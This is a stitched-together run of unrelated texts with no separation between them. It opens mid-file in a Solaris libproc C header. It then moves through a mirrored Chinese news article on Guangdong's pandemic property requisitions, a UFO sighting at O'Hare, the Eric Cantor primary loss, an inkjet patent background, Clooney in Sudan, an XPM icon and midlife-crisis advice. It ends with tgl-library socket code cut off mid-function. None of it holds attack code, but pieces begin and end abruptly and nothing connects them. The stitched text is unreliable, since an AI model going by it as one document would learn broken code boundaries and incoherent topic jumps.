ps_prochandle *, const char *); extern int pr_getpeername(struct ps_prochandle *, int, struct sockaddr *, socklen_t *); extern int pr_getsockname(struct ps_prochandle *, int, struct sockaddr *, socklen_t *); /* * Function prototypes for accessing per-LWP register information. */ extern int Plwp_getregs(struct ps_prochandle *, lwpid_t, prgregset_t); extern int Plwp_setregs(struct ps_prochandle *, lwpid_t, const prgregset_t); extern int Plwp_getfpregs(struct ps_prochandle *, lwpid_t, prfpregset_t *); extern int Plwp_setfpregs(struct ps_prochandle *, lwpid_t, const prfpregset_t *); #if defined(sparc) || defined(__sparc) extern int Plwp_getxregs(struct ps_prochandle *, lwpid_t, prxregset_t *); extern int Plwp_setxregs(struct ps_prochandle *, lwpid_t, const prxregset_t *); #if defined(__sparcv9) extern int Plwp_getasrs(struct ps_prochandle *, lwpid_t, asrset_t); extern int Plwp_setasrs(struct ps_prochandle *, lwpid_t, const asrset_t); #endif /* __sparcv9 */ #endif /* __sparc */ extern int Plwp_getpsinfo(struct ps_prochandle *, lwpid_t, lwpsinfo_t *); /* * LWP iteration interface. */ typedef int proc_lwp_f(void *, const lwpstatus_t *); extern int Plwp_iter(struct ps_prochandle *, proc_lwp_f *, void *); /* * Symbol table interfaces. */ /* * Pseudo-names passed to Plookup_by_name() for well-known load objects. * NOTE: It is required that PR_OBJ_EXEC and PR_OBJ_LDSO exactly match * the definitions of PS_OBJ_EXEC and PS_OBJ_LDSO from <proc_service.h>. */ #define PR_OBJ_EXEC ((const char *)0) /* search the executable file */ #define PR_OBJ_LDSO ((const char *)1) /* search ld.so.1 */ #define PR_OBJ_EVERY ((const char *)-1) /* search every load object */ /* * 'object_name' is the name of a load object obtained from an * iteration over the process's address space mappings (Pmapping_iter), * or an iteration over the process's mapped objects (Pobject_iter), * or else it is one of the special PR_OBJ_* values above. */ extern int Plookup_by_name(struct ps_prochandle *, const char *, const char *, GElf_Sym *); extern int Plookup_by_addr(struct ps_prochandle *, uintptr_t, char *, size_t, GElf_Sym *); typedef int proc_map_f(void *, const prmap_t *, const char *); extern int Pmapping_iter(struct ps_prochandle *, proc_map_f *, void *); extern int Pobject_iter(struct ps_prochandle *, proc_map_f *, void *); extern const prmap_t *Paddr_to_map(struct ps_prochandle *, uintptr_t); extern const prmap_t *Paddr_to_text_map(struct ps_prochandle *, uintptr_t); extern const prmap_t *Pname_to_map(struct ps_prochandle *, const char *); extern char *Pplatform(struct ps_prochandle *, char *, size_t); extern int Puname(struct ps_prochandle *, struct utsname *); extern char *Pexecname(struct ps_prochandle *, char *, size_t); extern char *Pobjname(struct ps_prochandle *, uintptr_t, char *, size_t); extern char *Pgetenv(struct ps_prochandle *, const char *, char *, size_t); extern long Pgetauxval(struct ps_prochandle *, int); /* * Symbol table iteration interface. */ typedef int proc_sym_f(void *, const GElf_Sym *, const char *); extern int Psymbol_iter(struct ps_prochandle *, const char *, int, int, proc_sym_f *, void *); /* * 'which' selects which symbol table and can be one of the following. */ #define PR_SYMTAB 1 #define PR_DYNSYM 2 /* * 'type' selects the symbols of interest by binding and type. It is a bit- * mask of one or more of the following flags, whose order MUST match the * order of STB and STT constants in <sys/elf.h>. */ #define BIND_LOCAL 0x0001 #define BIND_GLOBAL 0x0002 #define BIND_WEAK 0x0004 #define BIND_ANY (BIND_LOCAL|BIND_GLOBAL|BIND_WEAK) #define TYPE_NOTYPE 0x0100 #define TYPE_OBJECT 0x0200 #define TYPE_FUNC 0x0400 #define TYPE_SECTION 0x0800 #define TYPE_FILE 0x1000 #define TYPE_ANY (TYPE_NOTYPE|TYPE_OBJECT|TYPE_FUNC|TYPE_SECTION|TYPE_FILE) /* * This returns the rtld_db agent handle for the process. * The handle will become invalid at the next successful exec() and * must not be used beyond that point (see Preset_maps(), below). */ extern rd_agent_t *Prd_agent(struct ps_prochandle *); /* * This should be called when an RD_DLACTIVITY event with the * RD_CONSISTENT state occurs via librtld_db's event mechanism. * This makes libproc's address space mappings and symbol tables current. */ extern void Pupdate_maps(struct ps_prochandle *); /* * This must be called after the victim process performs a successful * exec() if any of the symbol table interface functions have been called * prior to that point. This is essential because an exec() invalidates * all previous symbol table and address space mapping information. * It is always safe to call, but if it is called other than after an * exec() by the victim process it just causes unnecessary overhead. * * The rtld_db agent handle obtained from a previous call to Prd_agent() is * made invalid by Preset_maps() and Prd_agent() must be called again to get * the new handle. */ extern void Preset_maps(struct ps_prochandle *); /* * Given an address, Ppltdest() determines if this is part of a PLT, and if * so returns the target address of this PLT entry and a flag indicating * whether or not this PLT entry has been bound by the run-time linker. */ extern uintptr_t Ppltdest(struct ps_prochandle *, uintptr_t, int *); /* * Stack frame iteration interface. */ #ifdef SOLARIS_11_B159_OR_LATER /* building on Nevada-B159 or later so define the new callback */ typedef int proc_stack_f( void *, /* the cookie given to Pstack_iter() */ const prgregset_t, /* the frame's registers */ uint_t, /* argc for the frame's function */ const long *, /* argv for the frame's function */ int, /* bitwise flags describing the frame (see below) */ int); /* a signal number */ #define PR_SIGNAL_FRAME 1 /* called by a signal handler */ #define PR_FOUND_SIGNAL 2 /* we found the corresponding signal number */ #else /* building on Nevada-B158 or earlier so define the old callback */ typedef int proc_stack_f(void *, const prgregset_t, uint_t, const long *); #endif extern int Pstack_iter(struct ps_prochandle *, const prgregset_t, proc_stack_f *, void *); /* * Compute the full pathname of a named directory without using chdir(). * This is useful for dealing with /proc/<pid>/cwd. */ extern char *proc_dirname(const char *, char *, size_t); /* * Remove unprintable characters from psinfo.pr_psargs and replace with * whitespace characters so it is safe for printing. */ extern void proc_unctrl_psinfo(psinfo_t *); /* * Utility functions for processing arguments which should be /proc files, * pids, and/or core files. The returned error code can be passed to * Pgrab_error() in order to convert it to an error string. */ #define PR_ARG_PIDS 0x1 /* Allow pid and /proc file arguments */ #define PR_ARG_CORES 0x2 /* Allow core file arguments */ #define PR_ARG_ANY (PR_ARG_PIDS | PR_ARG_CORES) extern struct ps_prochandle *proc_arg_grab(const char *, int, int, int *); extern pid_t proc_arg_psinfo(const char *, int, psinfo_t *, int *); /* * Utility functions for obtaining information via /proc without actually * performing a Pcreate() or Pgrab(): */ extern int proc_get_auxv(pid_t, auxv_t *, int); extern int proc_get_cred(pid_t, prcred_t *, int); extern int proc_get_psinfo(pid_t, psinfo_t *); extern int proc_get_status(pid_t, pstatus_t *); /* * Utility functions for debugging tools to convert numeric fault, * signal, and system call numbers to symbolic names: */ extern char *proc_fltname(int, char *, size_t); extern char *proc_signame(int, char *, size_t); extern char *proc_sysname(int, char *, size_t); #ifdef __cplusplus } #endif #endif /* _LIBPROC_H */
### 广东征用私人财产抗疫 变相掠夺民产会否蔓延全国?(图) ------------------------ #### [首页](https://github.com/gfw-breaker/banned-news/blob/master/README.md) &nbsp;&nbsp;|&nbsp;&nbsp; [手把手翻墙教程](https://github.com/gfw-breaker/guides/wiki) &nbsp;&nbsp;|&nbsp;&nbsp; [禁闻聚合安卓版](https://github.com/gfw-breaker/bn-android) &nbsp;&nbsp;|&nbsp;&nbsp; [网门安卓版](https://github.com/oGate2/oGate) &nbsp;&nbsp;|&nbsp;&nbsp; [神州正道安卓版](https://github.com/SzzdOgate/update) <div class="article_right" style="fone-color:#000"> <p style="text-align: center;"> <img alt="武漢肺炎" src="//img3.secretchina.com/pic/2020/2-7/p2621702a579316570-ss.jpg" style="height:337px; width:600px"/> <br> 各地政府截留在运输途中的医护物资(图片来源: Getty Images) <span id="hideid" name="hideid" style="color:red;display:none;"> <span href="https://www.secretchina.com"> </span> </span> </br> </p> <div id="txt-mid1-t21-2017"> <ins class="adsbygoogle" data-ad-client="ca-pub-1276641434651360" data-ad-slot="2451032099" style="display:inline-block;width:336px;height:280px"> </ins> <div id="SC-22xxx"> </div> </div> <p> 【看中国2020年2月13日讯】广东省是湖北以外 <strong> <span href="https://www.secretchina.com/news/gb/tag/武汉肺炎" target="_blank"> 武汉肺炎 </span> </strong> 疫情最严重的地区之一。广州和深圳人大11日通过紧急立法,授权市、区政府可根据疫情防控需要,征用私人场所、交通工具、设备等物资。外界质疑当局的目的,担心其它省市会效法广东,变相把抢掠民间物资的行为合理化。 <span id="hideid" name="hideid" style="color:red;display:none;"> <span href="https://www.secretchina.com"> </span> </span> </p> <p> 在武汉, 政府已征用学校、体育馆等设施,用来设置临时抗疫救治中心,各地政府也截留在运输途中的医护物资。在 <span href="https://www.secretchina.com/news/gb/tag/广东" target="_blank"> 广东 </span> 和深圳,政府干脆把这征用行为合法化。 </p> <p> 广东省人大常委会周二授权广州和深圳市政府,必要时可以依法紧急 <span href="https://www.secretchina.com/news/gb/tag/征用" target="_blank"> 征用 </span> 单位或个人的房屋、场地、交通工具以及相关设施,作防疫防控用途,并可要求相关企业组织提供疫情防控物资和生活必需品。两个市的人大也在同日通过有关决定,并且即时生效。 </p> <p> 广州市民梁一鸣形容新措施是把抢掠合法化。她认为,政府明明有更好的选择,不明白为什么要征用 <span href="https://www.secretchina.com/news/gb/tag/私人财产" target="_blank"> 私人财产 </span> 。 </p> <p> 梁一鸣说:“如果它用来隔离感染者,应该会征用比较封闭的,好管理一点的小区,把老百姓当成畜生一样关起来。每个区都有政府大楼,行政部门的大楼。本来政府大楼不属于党的,是属于我们纳税人共享的。如果它们能先征用政府大楼、派出所、公安局的话,我们愿意配合它们的防疫防控工作。” </p> <p> 学者担心征用措施会被滥用 </p> <p> 香港时事评论员刘锐绍表示,根据 <span href="https://www.secretchina.com" target="_blank"> 中国 </span> 大陆的有关法律,当局的确有权征用民间物资,但他担心有关举措会被滥用。 </p> <p> 刘锐绍表示:“你拿民间的物资,但有没有合理赔偿呢?如果民间不愿意,官方是否胡来、强来?虽然现在官方说,根据法律民间可以抗衡,但是法律主要是保护官方的。这反映疫情很可能进一步失控。官方也知道它们的物资不一定能控制疫情,所以先向民间打主意。” </p> <p> 这是中国改革开放以来地方政府首次推出同类措施,也是2007年物权法通过后,首次有地方政府获授权运用紧急权力征用私人财产。 </p> <p> 刘锐绍说:“我看这个所谓首次是取决于它是否拿出法律去封民间的口而已。在过去,强权根本不讲什么法律,照样抢掠民间物资。未来我不排除其他省市也会采取同样的方法。” </p> <p> 他认为,新措施不仅对官民齐心抗疫起不了作用,反而会加深民怨。 <center> <div> <div id="txt-mid2-t22-2017" style="display: block; max-height: 351px; overflow: hidden;"> <div id="SC-21xxx"> </div> <ins class="adsbygoogle" data-ad-client="ca-pub-1276641434651360" data-ad-format="auto" data-ad-slot="4301710469" data-full-width-responsive="true" style="display:block"> </ins> </div> </div> </center> <div style="padding-top:12px;"> </div> </p> </div> <hr/> 手机上长按并复制下列链接或二维码分享本文章:<br/> https://github.com/gfw-breaker/banned-news/blob/master/pages/p1/922907.md <br/> <a href='https://github.com/gfw-breaker/banned-news/blob/master/pages/p1/922907.md'><img src='https://github.com/gfw-breaker/banned-news/blob/master/pages/p1/922907.md.png'/></a> <br/> 原文地址(需翻墙访问):https://www.secretchina.com/news/gb/2020/02/13/922907.html ------------------------ #### [首页](https://github.com/gfw-breaker/banned-news/blob/master/README.md) &nbsp;|&nbsp; [一键翻墙软件](https://github.com/gfw-breaker/nogfw/blob/master/README.md) &nbsp;| [《九评共产党》](https://github.com/gfw-breaker/9ping.md/blob/master/README.md#九评之一评共产党是什么) | [《解体党文化》](https://github.com/gfw-breaker/jtdwh.md/blob/master/README.md) | [《共产主义的终极目的》](https://github.com/gfw-breaker/gczydzjmd.md/blob/master/README.md) <img src='http://gfw-breaker.win/banned-news/pages/p1/922907.md' width='0px' height='0px'/>
White Society – not sure if I made this clear, but basically the wind is blowing her black skin away, revealing white skin underneath. This is about how white’s basically control the society, or how people feel they do. About how even some blacks feel they ...
Custom Staircases Custom Kitchens Custom Baths Historic Preservation Luxury Renovation Custom Build We hope you enjoy the stories we tell with the images we’ve captured over our 30 years of renovations. We’ve taken such pleasure in solving problems that go along with every project, they are all different and that’s what we love. Here we’ve engaged in the unique challenges of historic preservation, luxury renovation, and custom building involving every room of the home, university, and commercial space. Kitchens, baths, fireplaces, and staircases. What are you imaging your space to be? There have been so many we haven’t posted. If there is a special project you have in mind, give John a call. We love new challenges. About For over thirty three years, Connaughton Construction has been providing exceptional building and renovation services to residential, commercial and private institutional clients in the Greater Boston area.Read More
John Popelard John Popelard (born 24 November 1985) is a French professional footballer who plays as a midfielder for FC Chambly in the French Ligue 2. Professional career Popelard joined FC Chambly in 2010, when they were in the Championnat National 3 and helped them to repeated promotions until they reached the professional Ligue 2 in 2019. He made his professional debut with Chambly in a 0–0 Ligue 2 tie with Sochaux on 18 October 2019. References External links Soccerway Profile Foot National Profile Category:1985 births Category:Living people Category:People from Senlis Category:French footballers Category:Association football midfielders Category:FC Chambly players Category:Ligue 2 players Category:Championnat National players Category:Championnat National 2 players Category:Championnat National 3 players
O'Hare UFO sighting in 2006 one of the most famous reported The city of Chicago isn’t known as a hotbed of UFO activity, but O’Hare Airport is the home of one of the most publicized sightings of the last decade. A “flying saucer-like object” was spotted over Concourse C of the United terminal in November 2006 by pilots, airline management and mechanics. The incident, reported by a Chicago Tribune columnist a few weeks later, noted the object was first seen by a United ramp worker around 4:30 p.m.. After that, a variety of witnesses said the object was dark gray and 6 to 24 feet in diameter. Some said it appeared as a spinning Frisbee while others said it wasn’t rotating at all. All agreed the object was silent and appeared just below the 1,900-foot cloud deck, until shooting off into the clouds and leaving a circular hole shape in the clouds. "But I know that what I saw and what a lot of other people saw stood out very clearly, and it definitely was not an [Earth] aircraft," one mechanic told reporter Jon Hilkevitch. A manager on Concourse B ran outside his office after hearing the report about the sighting on an internal airline radio frequency. "I knew no one would make a false call like that. But if somebody was bouncing a weather balloon or something else over O'Hare, we had to stop it because it was in very close proximity to our flight operations." The story was eventually picked up by many major media outlets, and caused people to reconsider the idea of UFOs, though the Federal Aviation Administration and the airline refused to investigate the incident. The FAA dismissed the incident as a weather phenomena and Dr. Mark Hammergren, an astronomer at Adler Planetarium, agreed, saying the weather conditions at O’Hare that day were right for a “hole-punch cloud.” “It’s something that occurs when a propeller or jet airplane passes through when you have uniform cloud cover and the temperature is right near the freezing point,” Hammergren explained. “ They make liquid water droplets freeze and a hazy disc of ice crystals descends from a hole, and it looks like a perfect hole punched in the cloud.” But for Center for UFO Studies Scientific Director Mark Rodeghier, the possible alien craft that appeared in the center’s own proverbial backyard remains a mystery worth exploring. “It’s an unknown object over O’Hare, and it’s seen by official personnel, and does United or the FAA take it seriously? Of course not, they have zero interest because UFOs can’t exist. But how can you not worry about something hovering over an airport after 9/11? It doesn’t make sense,” Rodeghier said. Journalist Leslie Kean also wrote about it in her book “UFOs: Generals, Pilots and Government Officials Go On The Record” and talked about in on “The Colbert Report” with Stephen Colbert in 2010, saying the government should investigate the O’Hare incident. "This thing was hovering over Chicago O'Hare Airport at rush hour," Kean said. "Lots of people saw it … the U.S. government never said a word."
Huge victory for tea party as Eric Cantor falls to Dave Brat In a stunning upset, the House’s No. 2 Republican, Eric Cantor, lost his primary on Tuesday night to little-known economics professor, Dave Brat. A possible upset was far off of many observers’ radar screens even heading into Election Day on Tuesday. But the tea-party-backed Brat rode to victory in a campaign that focused heavily on what he said was Cantor’s support for immigration reform that would have resulted in amnesty for illegal immigrants living in the U.S. The loss by Cantor immediately throws the House Republican leadership into disarray. The Virginia Republican was seen as among the top choices to succeed House Speaker John Boehner. What made the upset all the more shocking was that Brat had little financial backing for his run. The Washington Post reported Brat had just $40,000 in the bank at the end of March, while Cantor had $2 million. Among those spending independently to support Cantor were the National Association of Realtors and the National Rifle Association. Brat will now go on to face Democrat Jack Trammell in the general election this November. Trammell is a professor at Randolph-Macon College, where Brat is also a professor.
Labels Owen: “Collina told me 'you have to go down to win the penalty'” Michael Owen was a diver and he's happy to admit it now. Former Liverpool star Owen went down under a pretty non-existent foul from then-Argentina defender Mauricio Pochettino during England's 2002 World Cup campaign. Italian referee Pierluigi Collina was fooled as he pointed to the spot - with David Beckham thrashing in the penalty to complete his redemption from France 1998. And hit man Owen has now come clean over his dirty deed, but insists he only dived because he was told to by Collina. "Pochettino actually did touch me, clipped my knee. It wasn't enough to put me down, but the only reason I went down was because earlier in the game someone fouled me. "Collina was the referee, one of the most famous referees of all time, and I said 'referee it’s a penalty' and he said 'Michael to know you have to go down to win the penalty.' He told me you have to go down, so I thought next time I get touched I'll go down and I did and he gave me a penalty".
Conventionally known inkjet printers include paper moving type inkjet printers and flatbed type inkjet printers. Paper moving type inkjet printers use ink heads that move in a primary scanning direction to print on media carried in an auxiliary scanning direction (perpendicular to the primary scanning direction) by a carrier device. Flatbed type inkjet printers use ink heads that move freely in the primary scanning direction and auxiliary scanning direction to print on the media. In these conventional inkjet printers, color inks of various colors are discharged from moving ink heads onto the media to perform color printing on the media. In the color printing process using the inkjet printers described above, visible color inks, also called process color inks, such as cyan (C), magenta (M), yellow (Y) and black (K) which reflect light in their respective wavelength ranges, are generally used. The visible color inks in various colors are discharged from their individual ink heads for color printing to take place. However, the brightness of the images printed in color using the visible color inks or process color inks is limited because of the limited brightness of the visible color inks. The problem lies in that the brightness of a combination of process colors cannot exceed a certain threshold. For example, even if a user feels that the brightness of an image is lacking upon viewing a finished piece of printed media, the brightness of the image beyond what is inherent in each of the visible color inks cannot be obtained. As such, a color inkjet printer that can enhance the brightness of a printed color image is desired.
George Clooney visits volatile Sudan region Actor and human rights activist George Clooney made a quiet visit to a volatile border region between Sudan and South Sudan last week ahead of a testimony he will be giving before a US Senate committee on Wednesday. George Clooney addresses the Council on Foreign Relations regarding to the situation in Southern Sudan in New YorkPhoto: DON EMMERT/AFP/Getty Images Clooney made the dangerous crossing from South Sudan into Sudan's Nuba Mountains region, Jonathan Hutson, a spokesman for the anti-genocide group the Enough Project, said Tuesday. Clooney saw burned-out villages and met with residents forced to seek shelter in caves because of aerial attacks by Sudan's military. Violence has flared along the Sudan-South Sudan border since South Sudan seceded last year, and some experts worry the conflict could grow. South Sudan shut down its oil industry this year after accusing Sudan of stealing its oil. Wednesday's hearing before the Senate Foreign Relations Committee will examine the oil dispute and the limited access aid groups are being given to Sudan's southern regions. Aid experts say people who live in Sudan's Nuba Mountains will soon face a hunger crisis because they haven't been able to plant crops amid fear of attacks from Sudan. Clooney travelled to what is now known as South Sudan in January 2011 as the region cast votes to secede from Sudan. The vote was the culmination of a peace deal that ended more than two decades of civil war. After that visit, Clooney helped found the Satellite Sentinel Project, which uses satellite imagery to track military movements and attacks in the hopes of bringing attention to and potentially heading off hostilities. On his most recent visit Clooney, met South Sudan President Salva Kiir and the country's defense minister. John Prendergast, the co-founder of the advocacy group the Enough Project, also travelled to South Sudan last week. Prendergast and Princeton Lyman, the US envoy to Sudan and South Sudan, are also scheduled to speak at Wednesday's Senate hearing.
#ifndef COIN_PIXMAP_PERSPECTIVE_XPM #define COIN_PIXMAP_PERSPECTIVE_XPM /* XPM */ static const char * perspective_xpm[] = { "24 24 17 1", " c None", ". c #000000", "+ c #D20000", "@ c #ECEC00", "# c #FC4203", "$ c #AC0000", "% c #FFFF00", "& c #FF0000", "* c #C4C400", "= c #FFB862", "- c #840000", "; c #FFA940", "> c #666600", ", c #7D7D00", "' c #804000", ") c #FE8263", "! c #737300", " ", " . ", " .+.. ", " .@#+$.. ", " .@%#&&+$.. ", " .@%%#&&&&+$.. ", " .@@%%#&&&&&&+$.. ", " .*@%%=#&&&&&&&&&. ", " .*@%%%=#&&&&&&&&-. ", " .*@%%%%;&&&&&&&&>-. ", " .@%%%%%%=&&&&&&&>,-. ", " .*@%%%%%=&&&&&#>,'-. ", " .*@%%%%;&&&&#>,,'-. ", " .*@%%%;&&&&>,,,--. ", " .*@%%;&&&>,,,'--. ", " .*@%;&+>,,,,'--. ", " .*%;+',,,,'---. ", " .*)'!,,,,'--. ", " .'!,,,,,--. ", " ...,,,'-. ", " ..,-. ", " .. ", " ", " "}; #endif /* !COIN_PIXMAP_PERSPECTIVE_XPM */
The Washington County Sheriff’s Department said 397 vehicles were stopped. Ivan M. Alcide, 44, of Marshfield, was cited on a charge of driving with a suspended license, and Jonathon M. Wendt, 24, of Barre, was cited on possession of marijuana. Three traffic citations also were issued: two for drivers not having the proper registration papers and one for not stopping at a stop sign. The checkpoint was conducted with the Vermont State Police and police from Barre Town, Berlin, Montpelier and Northfield.
Test Driven RJS with “ARTS: Another RJS Testing System” Kevin Clark looked at his options for testing his RJS (Javascript templates for Rails) templates but wasn't happy with the limited options, so he rolled his own testing system as a Rails plugin. It's called ARTS (Another RJS Testing System) and is available here. It's pretty neat, and if your app uses a lot of RJS templates, you're going to want it. Here's an example of a test using ARTS: def test_create_rjsxhr:post,:create,:post=>{:title=>"Yet Another Post",:body=>"This is yet another post"}assert_rjs:insert_html,:bottom,'posts'assert_rjs:visual_effect,:highlight,"post_#{assigns(:post).id}"end Here are some general examples of how powerful it is: assert_rjs:alert,'Hi!'assert_rjs:assign,'a','2'assert_rjs:call,'foo','bar','baz'assert_rjs:draggable,'draggable_item'assert_rjs:drop_receiving,'receiving_item'assert_rjs:hide,"post_1","post_2","post_3"assert_rjs:insert_html,:bottom,'posts',"Here's text from insert_html"assert_rjs:redirect_to,:action=>'list'assert_rjs:remove,"post_1","post_2","post_3"assert_rjs:replace,:bottom,'This is something to replace'assert_rjs:replace_html,"This is something for replace_html"assert_rjs:show,"post_1","post_2","post_3"assert_rjs:sortable,'sortable_item'assert_rjs:toggle,"post_1","post_2","post_3"assert_rjs:visual_effect,:highlight,"posts",:duration=>'1.0'
Take Advantage of Your Midlife Crisis and Regain Your Joy for Life Most adults over the age of 50 have suffered a midlife crisis to some extent. Life rarely works out as planned. You may have had dreams of playing in the NBA, becoming a senator, living in Europe, or writing a best seller. Instead, you’ve spent your time in a cubicle helping your company sell paperclips to other people in cubicles. It’s natural to have some discouragement, but it’s not all downhill from here. Use your midlife crisis to your advantage: 1. Focus on what you have. There are places in the world where 7-year old orphans are digging through the dump for food and face sexual abuse on a daily basis. You may not have become the CEO of your company by age 45, but you’ll survive. * What do you have in your life that you can be grateful about right now? 2. Remember what you’ve accomplished. You’ve already accomplished several things you can be happy about. A few examples include: * Finishing school. * Buying a home. * Being a good spouse. * Raising successful children. * Being a good friend. * Showing up to work each day. * Being a good neighbor. * Anything else that fills you with pride. 3. Avoid doing anything foolish. Quitting work without another source of income, having an affair, or buying a Ferrari you can’t afford creates more challenges than it solves. Now isn’t the time to be impulsive. * You can make plans and begin putting them into action, but avoid making your life more challenging. 4. Use your midlife crisis as a wakeup call. A midlife crisis is a signal that your life isn’t going as planned, isn’t as meaningful as you’d like, and you believe you’re running out of time to make a change. But you can still make a change if you get started. * People have graduated medical school in their 60s. * Some best-selling authors and screenwriters didn’t get started until their 70s. * You might be too old to play quarterback for the Steelers, but there’s still time to accomplish plenty of amazing things. 5. Set some exciting goals. Set some goals that will result in feeling more positive about your life when you accomplish them. Start small. A small success will allow you to realize that you can accomplish bigger things. Gain some momentum and do something great. * What have you always wanted to do? * What is your passion? How could you make a living at it? * What can you do that would make your life feel more meaningful? 6. Do something new. A midlife crisis can be the result of living the same day over and over again without any reprieve in sight. Who says you can’t shake things up a bit? Attend a yoga class or learn how to weld. Attend a new church or start a blog. If your life is in a rut, you can only blame the person in the mirror. 7. Look at the big picture. Depending on your age and health, you may have 40+ productive years still to come. That’s a lot of time. It only takes nine years to become a neurosurgeon after college. You can do a lot in 40 years. How will you spend them? Use your midlife crisis as a sign that you might want to make a few changes to make your life more fulfilling. Remember the positive aspects of your life and be grateful for what you have and have accomplished. You’re still young enough to set new goals and be excited about what the future holds as you achieve them.
/* This file is part of tgl-library This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Copyright Vitaly Valtman 2013-2015 */ #ifdef HAVE_CONFIG_H #include "config.h" #endif #define _GNU_SOURCE #include <string.h> #include <stdlib.h> #include <assert.h> #include <sys/types.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/tcp.h> #include <fcntl.h> #include <sys/socket.h> #include <errno.h> #include <stdio.h> #include <unistd.h> #include <poll.h> #include "crypto/rand.h" #include <arpa/inet.h> #ifdef EVENT_V2 #include <event2/event.h> #else #include <event.h> #include "event-old.h" #endif #include <sys/time.h> #include <time.h> #include "tgl-net-inner.h" #include "tgl-net.h" #include "tgl.h" #include "tgl-inner.h" //#include "mtproto-client.h" //#include "mtproto-common.h" #include "tree.h" #include "tools.h" #include "mtproto-client.h" #ifndef POLLRDHUP #define POLLRDHUP 0 #endif //double get_utime (int clock_id); //extern struct mtproto_methods auth_methods; static void fail_connection (struct connection *c); #define PING_TIMEOUT 10 static void start_ping_timer (struct connection *c); static void ping_alarm (evutil_socket_t fd, short what, void *arg) { struct connection *c = arg; struct tgl_state *TLS = c->TLS; vlogprintf (E_DEBUG + 2,"ping alarm\n"); assert (c->state == conn_ready || c->state == conn_connecting); if (tglt_get_double_time () - c->last_receive_time > 6 * PING_TIMEOUT) { vlogprintf (E_WARNING, "fail connection: reason: ping timeout\n"); c->state = conn_failed; fail_connection (c); } else if (tglt_get_double_time () - c->last_receive_time > 3 * PING_TIMEOUT && c->state == conn_ready) { tgl_do_send_ping (c->TLS, c); start_ping_timer (c); } else { start_ping_timer (c); } } static void stop_ping_timer (struct connection *c) { event_del (c->ping_ev); } static void start_ping_timer (struct connection *c) { static struct timeval ptimeout = { PING_TIMEOUT, 0}; event_add (c->ping_ev, &ptimeout); } static void restart_connection (struct connection *c); static void fail_alarm (evutil_socket_t fd, short what, void *arg) { struct connection *c = arg; c->in_fail_timer = 0; restart_connection (c); } static void start_fail_timer (struct connection *c) { if (c->in_fail_timer) { return; } c->in_fail_timer = 1; static struct timeval ptimeout = { 10, 0}; event_add (c->fail_ev, &ptimeout); } static struct connection_buffer *new_connection_buffer (int size) { struct connection_buffer *b = talloc0 (sizeof (*b)); b->start = talloc (size); b->end = b->start + size; b->rptr = b->wptr = b->start; return b; } static void delete_connection_buffer (struct connection_buffer *b) { tfree (b->start, b->end - b->start); tfree (b, sizeof (*b)); } int tgln_write_out (struct connection *c, const void *_data, int len) { struct tgl_state *TLS = c->TLS; vlogprintf (E_DEBUG, "write_out: %d bytes\n", len); const unsigned char *data = _data; if (!len) { return 0; } assert (len > 0); int x = 0; if (!c->out_bytes) { event_add (c->write_ev, 0); } if (!c->out_head) { struct connection_buffer *b = new_connection_buffer (1 << 20); c->out_head = c->out_tail = b; } while (len) { if (c->out_tail->end - c->out_tail->wptr >= len) { memcpy (c->out_tail->wptr, data, len); c->out_tail->wptr += len; c->out_bytes += len; return x + len; } else { int y = c->out_tail->end - c->out_tail->wptr; assert (y < len); memcpy (c->out_tail->wptr, data, y); x += y; len -= y; data += y; struct connection_buffer *b = new_connection_buffer (1 << 20); c->out_tail->next = b; b->next = 0; c->out_tail = b; c->out_bytes += y; } } return x; } int tgln_read_in (struct connection *c, void *_data, int len) { unsigned char *data = _data; if (!len) { return 0; } assert (len > 0); if (len > c->in_bytes) { len = c->in_bytes; } int x = 0; while (len) { int y = c->in_head->wptr - c->in_head->rptr; if (y > len) { memcpy (data, c->in_head->rptr, len); c->in_head->rptr += len; c->in_bytes -= len; return x + len; } else { memcpy (data, c->in_head->rptr, y); c->in_bytes -= y; x += y; data += y; len -= y; void *old = c->in_head; c->in_head = c->in_head->next; if (!c->in_head) { c->in_tail = 0; } delete_connection_buffer (old); } } return x; } int tgln_read_in_lookup (struct connection *c, void *_data, int len) { unsigned char *data = _data; if (!len || !c->in_bytes) { return 0; } assert (len > 0); if (len > c->in_bytes) { len = c->in_bytes; } int x = 0; struct connection_buffer *b = c->in_head; while (len) { int y = b->wptr - b->rptr; if (y >= len) { memcpy (data, b->rptr, len); return x + len; } else { memcpy (data, b->rptr, y); x += y; data += y; len -= y; b = b->next; } } return x; } void tgln_flush_out (struct connection *c) { } #define MAX_CONNECTIONS 100 static struct connection *Connections[MAX_CONNECTIONS]; static int max_connection_fd; static void rotate_port (struct connection *c) { switch (c->port) { case 443: c->port = 80; break; case 80: c->port = 25; break; case 25: c->port = 443; break; } } static void try_read (struct connection *c); static void try_write (struct connection *c); static void conn_try_read (evutil_socket_t fd, short what, void *arg) { struct connection *c = arg; struct tgl_state *TLS = c->TLS; vlogprintf (E_DEBUG + 1, "Try read. Fd = %d\n", c->fd); try_read (c); } static void conn_try_write (evutil_socket_t fd, short what, void *arg) { struct connection *c = arg; struct tgl_state *TLS = c->TLS; if (c->state == conn_connecting) { c->state = conn_ready; c->methods->ready (TLS, c); } try_write (c); if (c->out_bytes) { event_add (c->write_ev, 0); } } static int my_connect (struct connection *c, const char *host) { struct tgl_state *TLS = c->TLS; int v6 = TLS->ipv6_enabled; int fd = socket (v6 ? AF_INET6 : AF_INET, SOCK_STREAM, 0); if (fd < 0) { vlogprintf (E_ERROR, "Can not create socket: %s\n", strerror(errno)); start_fail_timer (c); return -1; } assert (fd >= 0 && fd < MAX_CONNECTIONS); if (fd > max_connection_fd) { max_connection_fd = fd; } int flags = -1; setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &flags, sizeof (flags)); setsockopt (fd, SOL_SOCKET, SO_KEEPALIVE, &flags, sizeof (flags)); setsockopt (fd, IPPROTO_TCP, TCP_NODELAY, &flags, sizeof (flags)); struct sockaddr_in addr; struct sockaddr_in6 addr6; memset (&addr, 0, sizeof (addr)); memset (&addr6, 0, sizeof (addr6)); if (v6) { addr6.sin6_family = AF_INET6; addr6.sin6_port = htons (c->port); 